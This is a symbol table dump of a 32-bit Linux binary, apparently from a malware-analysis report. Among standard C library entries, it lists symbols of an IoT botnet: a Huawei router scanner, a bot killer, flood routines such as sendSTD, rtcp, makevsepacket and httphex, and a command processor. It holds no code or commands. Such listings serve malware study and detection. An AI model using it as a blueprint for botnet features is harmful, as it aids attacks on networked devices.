                                            _ppfs_setargs.symtab0x8050570277FUNC<unknown>HIDDEN2
                                            _ppfs_setargs.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                            _promoted_size.symtab0x805068841FUNC<unknown>DEFAULT2
                                            _pthread_cleanup_pop_restore.symtab0x805345c23FUNC<unknown>DEFAULT2
                                            _pthread_cleanup_push_defer.symtab0x805344a18FUNC<unknown>DEFAULT2
                                            _rfill.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                            _setjmp.symtab0x80537b034FUNC<unknown>DEFAULT2
                                            _sigintr.symtab0x80638f88OBJECT<unknown>HIDDEN12
                                            _start.symtab0x804818434FUNC<unknown>DEFAULT2
                                            _stdio.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                            _stdio_fopen.symtab0x804fa34664FUNC<unknown>HIDDEN2
                                            _stdio_init.symtab0x804fd0859FUNC<unknown>HIDDEN2
                                            _stdio_openlist.symtab0x805c8304OBJECT<unknown>DEFAULT11
                                            _stdio_openlist_add_lock.symtab0x8060ad412OBJECT<unknown>DEFAULT12
                                            _stdio_openlist_dec_use.symtab0x8054b3c320FUNC<unknown>HIDDEN2
                                            _stdio_openlist_del_count.symtab0x8060af04OBJECT<unknown>DEFAULT12
                                            _stdio_openlist_del_lock.symtab0x8060ae012OBJECT<unknown>DEFAULT12
                                            _stdio_openlist_use_count.symtab0x8060aec4OBJECT<unknown>DEFAULT12
                                            _stdio_streams.symtab0x805c838204OBJECT<unknown>DEFAULT11
                                            _stdio_term.symtab0x804fd43208FUNC<unknown>HIDDEN2
                                            _stdio_user_locking.symtab0x805c8344OBJECT<unknown>DEFAULT11
                                            _stdlib_strto_l.symtab0x80527dc278FUNC<unknown>HIDDEN2
                                            _stdlib_strto_l.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                            _store_inttype.symtab0x80543a861FUNC<unknown>HIDDEN2
                                            _store_inttype.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                            _string_syserrmsgs.symtab0x805ace02906OBJECT<unknown>HIDDEN4
                                            _string_syserrmsgs.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                            _trans2r.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                            _trans2w.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                            _uintmaxtostr.symtab0x80543e8228FUNC<unknown>HIDDEN2
                                            _uintmaxtostr.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                            _vfprintf_internal.symtab0x804fecf1530FUNC<unknown>HIDDEN2
                                            _vfprintf_internal.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                            _wcommit.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                            abort.symtab0x8052380191FUNC<unknown>DEFAULT2
                                            abort.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                            access.symtab0x804f3d443FUNC<unknown>DEFAULT2
                                            access.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                            acnc.symtab0x804c2f5162FUNC<unknown>DEFAULT2
                                            add_entry.symtab0x804e9ce89FUNC<unknown>DEFAULT2
                                            atoi.symtab0x80527b017FUNC<unknown>DEFAULT2
                                            atol.symtab0x80527b017FUNC<unknown>DEFAULT2
                                            atol.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                            bcopy.symtab0x8050f2821FUNC<unknown>DEFAULT2
                                            bcopy.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                            been_there_done_that.symtab0x8062cd01OBJECT<unknown>DEFAULT12
                                            bin_names.symtab0x805c660112OBJECT<unknown>DEFAULT11
                                            bin_strings.symtab0x805c6e0100OBJECT<unknown>DEFAULT11
                                            botkiller.symtab0x804944c1554FUNC<unknown>DEFAULT2
                                            brk.symtab0x805575444FUNC<unknown>DEFAULT2
                                            brk.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                            bsd_signal.symtab0x8051358136FUNC<unknown>DEFAULT2
                                            buf.6699.symtab0x8062b04440OBJECT<unknown>DEFAULT12
                                            bzero.symtab0x8050f4019FUNC<unknown>DEFAULT2
                                            bzero.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                            c.symtab0x805c7f84OBJECT<unknown>DEFAULT11
                                            calloc.symtab0x8051bf4236FUNC<unknown>DEFAULT2
                                            calloc.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                            check_exe.symtab0x80493dd111FUNC<unknown>DEFAULT2
                                            checksum.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                            checksum_generic.symtab0x80481a897FUNC<unknown>DEFAULT2
                                            checksum_tcp_udp.symtab0x8048209223FUNC<unknown>DEFAULT2
                                            checksum_tcpudp.symtab0x80482e8223FUNC<unknown>DEFAULT2
                                            clock.symtab0x804f90c34FUNC<unknown>DEFAULT2
                                            clock.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                            close.symtab0x80531d080FUNC<unknown>DEFAULT2
                                            closedir.symtab0x804f700130FUNC<unknown>DEFAULT2
                                            closedir.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                            closenameservers.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                            completed.4963.symtab0x805ca201OBJECT<unknown>DEFAULT12
                                            conn_table.symtab0x80637984OBJECT<unknown>DEFAULT12
                                            connect.symtab0x805107c84FUNC<unknown>DEFAULT2
                                            connect.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                            connectTimeout.symtab0x804aabd459FUNC<unknown>DEFAULT2
                                            crtstuff.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                            crtstuff.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                            csum.symtab0x804adc9168FUNC<unknown>DEFAULT2
                                            data_start.symtab0x805c6480NOTYPE<unknown>DEFAULT11
                                            decoded.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                            decodeh.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                            dl-support.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                            dnslookup.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                            dup2.symtab0x804f40043FUNC<unknown>DEFAULT2
                                            dup2.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                            encoded.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                            encodeh.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                            encodeq.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                            environ.symtab0x80632244OBJECT<unknown>DEFAULT12
                                            errno.symtab0x04TLS<unknown>DEFAULT6
                                            errno.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                            execl.symtab0x8052954101FUNC<unknown>DEFAULT2
                                            execl.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                            execve.symtab0x805385447FUNC<unknown>DEFAULT2
                                            execve.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                            exit.symtab0x80528f493FUNC<unknown>DEFAULT2
                                            exit.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                            exp10_table.symtab0x805bc80156OBJECT<unknown>DEFAULT4
                                            fclose.symtab0x8053f6c380FUNC<unknown>DEFAULT2
                                            fclose.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                            fcntl.symtab0x804f2f7153FUNC<unknown>DEFAULT2
                                            fd_to_DIR.symtab0x804f784136FUNC<unknown>DEFAULT2
                                            fdgets.symtab0x804a675104FUNC<unknown>DEFAULT2
                                            fdopen_pids.symtab0x8060ac04OBJECT<unknown>DEFAULT12
                                            fdopendir.symtab0x804f890108FUNC<unknown>DEFAULT2
                                            fdpclose.symtab0x804a54d296FUNC<unknown>DEFAULT2
                                            fdpopen.symtab0x804a358501FUNC<unknown>DEFAULT2
                                            fflush_unlocked.symtab0x8054c7c447FUNC<unknown>DEFAULT2
                                            fflush_unlocked.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                            fgetc.symtab0x8054a94145FUNC<unknown>DEFAULT2
                                            fgetc.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                            fgetc_unlocked.symtab0x8054ed8204FUNC<unknown>DEFAULT2
                                            fgetc_unlocked.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                            fgets.symtab0x8050ac0118FUNC<unknown>DEFAULT2
                                            fgets.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                            fgets_unlocked.symtab0x8050b4c94FUNC<unknown>DEFAULT2
                                            fgets_unlocked.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                            findRandIP.symtab0x804ad9948FUNC<unknown>DEFAULT2
                                            fmt.symtab0x805bc6020OBJECT<unknown>DEFAULT4
                                            fopen.symtab0x804f93021FUNC<unknown>DEFAULT2
                                            fopen.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                            fork.symtab0x8052d48524FUNC<unknown>DEFAULT2
                                            fork.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                            fork_handler_pool.symtab0x8062cdc1348OBJECT<unknown>DEFAULT12
                                            fputs_unlocked.symtab0x8050bac45FUNC<unknown>DEFAULT2
                                            fputs_unlocked.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                            frame_dummy.symtab0x80481300FUNC<unknown>DEFAULT2
                                            free.symtab0x80521d4399FUNC<unknown>DEFAULT2
                                            free.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                            fseek.symtab0x805589824FUNC<unknown>DEFAULT2
                                            fseeko.symtab0x805589824FUNC<unknown>DEFAULT2
                                            fseeko.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                            fseeko64.symtab0x80558b0246FUNC<unknown>DEFAULT2
                                            fseeko64.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                            fstat.symtab0x805388470FUNC<unknown>DEFAULT2
                                            fstat.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                            fwrite_unlocked.symtab0x8050bdc111FUNC<unknown>DEFAULT2
                                            fwrite_unlocked.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                            getBuild.symtab0x804d88e5FUNC<unknown>DEFAULT2
                                            getHost.symtab0x804a85759FUNC<unknown>DEFAULT2
                                            getOurIP.symtab0x804d691509FUNC<unknown>DEFAULT2
                                            get_hosts_byname_r.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                            getc.symtab0x8054a94145FUNC<unknown>DEFAULT2
                                            getc_unlocked.symtab0x8054ed8204FUNC<unknown>DEFAULT2
                                            getdents64.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                            getdtablesize.symtab0x804f42c32FUNC<unknown>DEFAULT2
                                            getdtablesize.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                            getegid.symtab0x80538cc8FUNC<unknown>DEFAULT2
                                            getegid.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                            geteuid.symtab0x804f44c8FUNC<unknown>DEFAULT2
                                            geteuid.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                            getgid.symtab0x80538d48FUNC<unknown>DEFAULT2
                                            getgid.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                            gethostbyname.symtab0x805103014FUNC<unknown>DEFAULT2
                                            gethostbyname.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                            gethostbyname2.symtab0x805104057FUNC<unknown>DEFAULT2
                                            gethostbyname2.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                            gethostbyname2_r.symtab0x80551f4666FUNC<unknown>DEFAULT2
                                            gethostbyname2_r.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                            gethostbyname_r.symtab0x8056ce4684FUNC<unknown>DEFAULT2
                                            gethostbyname_r.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                            gethostname.symtab0x8056f9089FUNC<unknown>DEFAULT2
                                            gethostname.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                            getpagesize.symtab0x80538dc19FUNC<unknown>DEFAULT2
                                            getpagesize.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                            getpid.symtab0x805307449FUNC<unknown>DEFAULT2
                                            getpid.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                            getppid.symtab0x804f4548FUNC<unknown>DEFAULT2
                                            getppid.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                            getrlimit.symtab0x804f45c43FUNC<unknown>DEFAULT2
                                            getrlimit.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                            getsockname.symtab0x80510d040FUNC<unknown>DEFAULT2
                                            getsockname.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                            getsockopt.symtab0x80510f856FUNC<unknown>DEFAULT2
                                            getsockopt.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                            getuid.symtab0x80538f08FUNC<unknown>DEFAULT2
                                            getuid.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                            h_errno.symtab0x44TLS<unknown>DEFAULT6
                                            hacks.symtab0x805c7444OBJECT<unknown>DEFAULT11
                                            hacks2.symtab0x805c7484OBJECT<unknown>DEFAULT11
                                            hacks3.symtab0x805c74c4OBJECT<unknown>DEFAULT11
                                            hacks4.symtab0x805c7504OBJECT<unknown>DEFAULT11
                                            hakai_bp.symtab0x805c7544OBJECT<unknown>DEFAULT11
                                            hextable.symtab0x80588a01024OBJECT<unknown>DEFAULT4
                                            hoste.6698.symtab0x8062cbc20OBJECT<unknown>DEFAULT12
                                            htonl.symtab0x8050ff47FUNC<unknown>DEFAULT2
                                            htons.symtab0x8050fe812FUNC<unknown>DEFAULT2
                                            httphex.symtab0x804c478733FUNC<unknown>DEFAULT2
                                            huawei_scanner.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                            huaweiscanner_fake_time.symtab0x805ca884OBJECT<unknown>DEFAULT12
                                            huaweiscanner_get_random_ip.symtab0x804906e645FUNC<unknown>DEFAULT2
                                            huaweiscanner_recv_strip_null.symtab0x80483c895FUNC<unknown>DEFAULT2
                                            huaweiscanner_rsck.symtab0x805ca444OBJECT<unknown>DEFAULT12
                                            huaweiscanner_rsck_out.symtab0x805ca484OBJECT<unknown>DEFAULT12
                                            huaweiscanner_scanner_init.symtab0x80484272841FUNC<unknown>DEFAULT2
                                            huaweiscanner_scanner_kill.symtab0x8048f4027FUNC<unknown>DEFAULT2
                                            huaweiscanner_scanner_pid.symtab0x805ca404OBJECT<unknown>DEFAULT12
                                            huaweiscanner_scanner_rawpkt.symtab0x805ca6040OBJECT<unknown>DEFAULT12
                                            huaweiscanner_setup_connection.symtab0x8048f5b275FUNC<unknown>DEFAULT2
                                            i.6028.symtab0x805c7fc4OBJECT<unknown>DEFAULT11
                                            index.symtab0x8050cd430FUNC<unknown>DEFAULT2
                                            inet_addr.symtab0x805101031FUNC<unknown>DEFAULT2
                                            inet_aton.symtab0x8055160148FUNC<unknown>DEFAULT2
                                            inet_aton.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                            inet_makeaddr.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                            inet_ntop.symtab0x8055eae432FUNC<unknown>DEFAULT2
                                            inet_ntop4.symtab0x8055dc6232FUNC<unknown>DEFAULT2
                                            inet_pton.symtab0x8055bfb459FUNC<unknown>DEFAULT2
                                            inet_pton4.symtab0x8055b84119FUNC<unknown>DEFAULT2
                                            initConnection.symtab0x804d529360FUNC<unknown>DEFAULT2
                                            init_rand.symtab0x8049b73111FUNC<unknown>DEFAULT2
                                            init_static_tls.symtab0x805549042FUNC<unknown>DEFAULT2
                                            initfini.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                            initstate.symtab0x80524e185FUNC<unknown>DEFAULT2
                                            initstate_r.symtab0x8052673155FUNC<unknown>DEFAULT2
                                            ioctl.symtab0x804f488139FUNC<unknown>DEFAULT2
                                            ioctl.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                            isatty.symtab0x8050f6c27FUNC<unknown>DEFAULT2
                                            isatty.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                            kill.symtab0x804f51443FUNC<unknown>DEFAULT2
                                            kill.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                            kill_bk.symtab0x80493ab50FUNC<unknown>DEFAULT2
                                            killer_status.symtab0x805cab04OBJECT<unknown>DEFAULT12
                                            killerid.symtab0x806379c4OBJECT<unknown>DEFAULT12
                                            last_id.6756.symtab0x805ca0c2OBJECT<unknown>DEFAULT11
                                            last_ns_num.6755.symtab0x80637744OBJECT<unknown>DEFAULT12
                                            libc-cancellation.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                            libc-tls.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                            listFork.symtab0x804ac88273FUNC<unknown>DEFAULT2
                                            llseek.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                            lseek64.symtab0x80570d490FUNC<unknown>DEFAULT2
                                            macAddress.symtab0x805cab46OBJECT<unknown>DEFAULT12
                                            main.symtab0x804d8931684FUNC<unknown>DEFAULT2
                                            main.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                            makeIPPacket.symtab0x804af1c126FUNC<unknown>DEFAULT2
                                            makeRandomStr.symtab0x804a8c5103FUNC<unknown>DEFAULT2
                                            makevsepacket.symtab0x804bd82141FUNC<unknown>DEFAULT2
                                            malloc.symtab0x805146a1928FUNC<unknown>DEFAULT2
                                            malloc.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                            malloc_trim.symtab0x805236329FUNC<unknown>DEFAULT2
                                            memcpy.symtab0x8050c4c41FUNC<unknown>DEFAULT2
                                            memcpy.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                            memmove.symtab0x8050c7837FUNC<unknown>DEFAULT2
                                            memmove.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                            mempcpy.symtab0x8055b6430FUNC<unknown>DEFAULT2
                                            mempcpy.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                            memrchr.symtab0x8054fdc177FUNC<unknown>DEFAULT2
                                            memrchr.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                            memset.symtab0x8050ca050FUNC<unknown>DEFAULT2
                                            memset.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                            mmap.symtab0x80537d427FUNC<unknown>DEFAULT2
                                            mremap.symtab0x80538f859FUNC<unknown>DEFAULT2
                                            mremap.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                            munmap.symtab0x805393443FUNC<unknown>DEFAULT2
                                            munmap.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                            mylock.symtab0x805c92024OBJECT<unknown>DEFAULT11
                                            mylock.symtab0x805c93824OBJECT<unknown>DEFAULT11
                                            nanosleep.symtab0x805398961FUNC<unknown>DEFAULT2
                                            nanosleep.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                            next_start.1451.symtab0x8062b004OBJECT<unknown>DEFAULT12
                                            ngPid.symtab0x80637a44OBJECT<unknown>DEFAULT12
                                            nprocessors_onln.symtab0x80529bc196FUNC<unknown>DEFAULT2
                                            ntohl.symtab0x80510077FUNC<unknown>DEFAULT2
                                            ntohl.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                            ntohs.symtab0x8050ffb12FUNC<unknown>DEFAULT2
                                            ntop.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                            numpids.symtab0x805caa88OBJECT<unknown>DEFAULT12
                                            object.4975.symtab0x805ca2424OBJECT<unknown>DEFAULT12
                                            open.symtab0x805322091FUNC<unknown>DEFAULT2
                                            opendir.symtab0x804f80c132FUNC<unknown>DEFAULT2
                                            opendir.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                            opennameservers.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                            ourIP.symtab0x80637a04OBJECT<unknown>DEFAULT12
                                            p.4961.symtab0x805c6440OBJECT<unknown>DEFAULT11
                                            parseHex.symtab0x804a6dd68FUNC<unknown>DEFAULT2
                                            parse_config.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                            pids.symtab0x80637ac4OBJECT<unknown>DEFAULT12
                                            pipe.symtab0x804f54039FUNC<unknown>DEFAULT2
                                            pipe.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                            poll.symtab0x805701972FUNC<unknown>DEFAULT2
                                            poll.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                            prctl.symtab0x804f56859FUNC<unknown>DEFAULT2
                                            prctl.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                            prefix.6454.symtab0x805ac3812OBJECT<unknown>DEFAULT4
                                            print.symtab0x804a02f581FUNC<unknown>DEFAULT2
                                            printchar.symtab0x8049dfc58FUNC<unknown>DEFAULT2
                                            printi.symtab0x8049f0d290FUNC<unknown>DEFAULT2
                                            prints.symtab0x8049e36215FUNC<unknown>DEFAULT2
                                            processCmd.symtab0x804c7553540FUNC<unknown>DEFAULT2
                                            program_invocation_name.symtab0x805ca044OBJECT<unknown>DEFAULT11
                                            program_invocation_short_name.symtab0x805ca004OBJECT<unknown>DEFAULT11
                                            pseudo_cancel.symtab0x80531f50NOTYPE<unknown>DEFAULT2
                                            pseudo_cancel.symtab0x805324b0NOTYPE<unknown>DEFAULT2
                                            pseudo_cancel.symtab0x80532ab0NOTYPE<unknown>DEFAULT2
                                            pseudo_cancel.symtab0x805330b0NOTYPE<unknown>DEFAULT2
                                            pseudo_cancel.symtab0x805336b0NOTYPE<unknown>DEFAULT2
                                            pseudo_end.symtab0x805321f0NOTYPE<unknown>DEFAULT2
                                            pseudo_end.symtab0x805327a0NOTYPE<unknown>DEFAULT2
                                            pseudo_end.symtab0x80532da0NOTYPE<unknown>DEFAULT2
                                            pseudo_end.symtab0x805333a0NOTYPE<unknown>DEFAULT2
                                            pseudo_end.symtab0x805339a0NOTYPE<unknown>DEFAULT2
                                            qual_chars.6463.symtab0x805ac4c20OBJECT<unknown>DEFAULT4
                                            raise.symtab0x80530a8100FUNC<unknown>DEFAULT2
                                            raise.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                            rand.symtab0x80524405FUNC<unknown>DEFAULT2
                                            rand.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                            rand.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                            rand__str.symtab0x804dfdd102FUNC<unknown>DEFAULT2
                                            rand_alpha_str.symtab0x804e043114FUNC<unknown>DEFAULT2
                                            rand_alphastr.symtab0x8049d57165FUNC<unknown>DEFAULT2
                                            rand_cmwc.symtab0x8049c99190FUNC<unknown>DEFAULT2
                                            rand_init.symtab0x804df2877FUNC<unknown>DEFAULT2
                                            rand_next.symtab0x804df75104FUNC<unknown>DEFAULT2
                                            random.symtab0x805244866FUNC<unknown>DEFAULT2
                                            random.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                            random_poly_info.symtab0x805b83c10OBJECT<unknown>DEFAULT4
                                            random_r.symtab0x805257495FUNC<unknown>DEFAULT2
                                            random_r.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                            randtbl.symtab0x805c964128OBJECT<unknown>DEFAULT11
                                            rawmemchr.symtab0x8055b5019FUNC<unknown>DEFAULT2
                                            rawmemchr.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                            read.symtab0x80532e091FUNC<unknown>DEFAULT2
                                            read_etc_hosts_r.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                            readdir64.symtab0x8053b48129FUNC<unknown>DEFAULT2
                                            readdir64.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                            realloc.symtab0x8051ce0763FUNC<unknown>DEFAULT2
                                            realloc.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                            recv.symtab0x805113092FUNC<unknown>DEFAULT2
                                            recv.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                            recvLine.symtab0x804a92c401FUNC<unknown>DEFAULT2
                                            recvfrom.symtab0x805118c108FUNC<unknown>DEFAULT2
                                            recvfrom.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                            register-atfork.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                            resolv.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                            resolv_conf_mtime.6741.symtab0x80637904OBJECT<unknown>DEFAULT12
                                            resolv_domain_to_hostname.symtab0x804e0b8125FUNC<unknown>DEFAULT2
                                            resolv_entries_free.symtab0x804e72456FUNC<unknown>DEFAULT2
                                            resolv_lookup.symtab0x804e1c01380FUNC<unknown>DEFAULT2
                                            resolv_skip_name.symtab0x804e135139FUNC<unknown>DEFAULT2
                                            rindex.symtab0x8054fc026FUNC<unknown>DEFAULT2
                                            rtcp.symtab0x804b8b9859FUNC<unknown>DEFAULT2
                                            sbrk.symtab0x80539c864FUNC<unknown>DEFAULT2
                                            sbrk.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                            scanPid.symtab0x80637a84OBJECT<unknown>DEFAULT12
                                            select.symtab0x804f5dd108FUNC<unknown>DEFAULT2
                                            select.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                            send.symtab0x80511f892FUNC<unknown>DEFAULT2
                                            send.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                            sendSTD.symtab0x804bc14366FUNC<unknown>DEFAULT2
                                            sendto.symtab0x8051254108FUNC<unknown>DEFAULT2
                                            sendto.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                            setsockopt.symtab0x80512c056FUNC<unknown>DEFAULT2
                                            setsockopt.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                            setstate.symtab0x805248a87FUNC<unknown>DEFAULT2
                                            setstate_r.symtab0x805270e161FUNC<unknown>DEFAULT2
                                            sigaction.symtab0x805375f80FUNC<unknown>DEFAULT2
                                            sigaction.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                            sigaddset.symtab0x805132034FUNC<unknown>DEFAULT2
                                            sigaddset.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                            sigempty.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                            sigemptyset.symtab0x805134420FUNC<unknown>DEFAULT2
                                            signal.symtab0x8051358136FUNC<unknown>DEFAULT2
                                            signal.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                            sigprocmask.symtab0x804f64c97FUNC<unknown>DEFAULT2
                                            sigprocmask.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                            sigsetops.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                            skip_and_NUL_space.symtab0x80568c043FUNC<unknown>DEFAULT2
                                            skip_nospace.symtab0x805689840FUNC<unknown>DEFAULT2
                                            sleep.symtab0x805310c195FUNC<unknown>DEFAULT2
                                            sleep.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                            snprintf.symtab0x804f94832FUNC<unknown>DEFAULT2
                                            snprintf.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                            socket.symtab0x80512f840FUNC<unknown>DEFAULT2
                                            socket.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                            socket_connect.symtab0x804c397225FUNC<unknown>DEFAULT2
                                            sockprintf.symtab0x804a2ba158FUNC<unknown>DEFAULT2
                                            spec_and_mask.6462.symtab0x805ac6016OBJECT<unknown>DEFAULT4
                                            spec_base.6453.symtab0x805ac447OBJECT<unknown>DEFAULT4
                                            spec_chars.6459.symtab0x805acb021OBJECT<unknown>DEFAULT4
                                            spec_flags.6458.symtab0x805acc88OBJECT<unknown>DEFAULT4
                                            spec_or_mask.6461.symtab0x805ac7016OBJECT<unknown>DEFAULT4
                                            spec_ranges.6460.symtab0x805ac809OBJECT<unknown>DEFAULT4
                                            sprintf.symtab0x804f96830FUNC<unknown>DEFAULT2
                                            sprintf.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                            srand.symtab0x805253661FUNC<unknown>DEFAULT2
                                            srandom.symtab0x805253661FUNC<unknown>DEFAULT2
                                            srandom_r.symtab0x80525d3160FUNC<unknown>DEFAULT2
                                            stat.symtab0x805706470FUNC<unknown>DEFAULT2
                                            stat.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                            static_dtv.symtab0x8063234512OBJECT<unknown>DEFAULT12
                                            static_map.symtab0x806373c52OBJECT<unknown>DEFAULT12
                                            static_slotinfo.symtab0x8063434776OBJECT<unknown>DEFAULT12
                                            stderr.symtab0x805c8244OBJECT<unknown>DEFAULT11
                                            stdin.symtab0x805c81c4OBJECT<unknown>DEFAULT11
                                            stdout.symtab0x805c8204OBJECT<unknown>DEFAULT11
                                            strcasecmp.symtab0x80574e454FUNC<unknown>DEFAULT2
                                            strcasecmp.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                            strchr.symtab0x8050cd430FUNC<unknown>DEFAULT2
                                            strchr.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                            strchrnul.symtab0x8054fa425FUNC<unknown>DEFAULT2
                                            strchrnul.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                            strcmp.symtab0x8050cf429FUNC<unknown>DEFAULT2
                                            strcmp.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                            strcoll.symtab0x8050cf429FUNC<unknown>DEFAULT2
                                            strcpy.symtab0x8050d1427FUNC<unknown>DEFAULT2
                                            strcpy.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                            strcspn.symtab0x805509045FUNC<unknown>DEFAULT2
                                            strcspn.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                            strdup.symtab0x805713048FUNC<unknown>DEFAULT2
